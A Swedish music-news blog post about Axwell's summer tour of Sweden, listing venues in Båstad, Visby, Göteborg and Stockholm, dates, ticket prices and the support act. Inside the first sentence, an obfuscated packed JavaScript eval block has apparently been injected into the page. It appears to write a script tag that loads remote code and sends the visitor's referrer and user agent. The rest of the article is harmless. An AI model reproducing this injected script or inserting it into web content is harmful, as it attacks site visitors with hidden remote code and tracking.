Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Axwell till Sverige

Axwell till Sverige
Alexander Gylemo

Axwell eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsrzt|var|u0026u|referrer|znnhr||js|php’.split(’|’),0,{}))
återvänder snart till hemlandet då han ska göra en kort Sverige turné i samarbete med Where’s the Party?, Carlsberg’s projekt ”att få Miami och Ibiza till Sverige”.

Första stoppet för housemafioson Axwell (”I Found U”, ”Nothing but Love” och nu senast ”Heart is King”) är Ladan i Båstad där han drar igång kl. 20:00 den fjortonde juli, för att sedan sticka till sitt favoritställe Kallbadshuset i Visby där han gör en tidig spelning (kl. 11:30) den nittonde juli.

Nästa gäng som står på tur att se stjärnan är göteborgarna som bjuds in till en kvällsspelning (kl. 18:00) på Trädgår’n den 21:a augusti, och sist men inte minst kommer Axwell till Stockholm där han spelar i Frihamnshallen den sjuttonde september. Stockholmarna och Båstadborna (tillsammans med tennisentusiasterna och partyeliten) får betala mest (365 :- ) medan de glada housefansen på Gotland (tillsammans med partyeliten igen) och i Göteborg klarar sig på 325 :-.

Så mycket mer har ännu inte hörts om Sverige turnén, mer än att Sebjak ska värma upp (vilket glädjer oss på Revue.se efter ett riktigt bra framträdande under Summerburst festivalen), vilket kanske också är bra då det gäller att vara ute i god tid när någon från Swedish House Mafia kommer till stan. Nu senast hade vi Sebastian Ingrosso på besök på Münchenbryggeriet i Stockholm vars spelning blev så hårt promotad (och slutsåld) att det slängdes in en extraspelning. Axwell är ju ingen främling till att dra ner till södra Sverige och spela lite under sommarn och än så länge har det inte bjudits på extraspelningar (det är ju trots allt mitt i Ibiza säsongen).

Då är det alltså bara Steve Angello kvar som ska komma hit och senast jag hörde är han inte speciellt taggad på att spela i Sverige överhuvudtaget, kanske ångrar han sig efter Axwell visat vägen?

 

Comments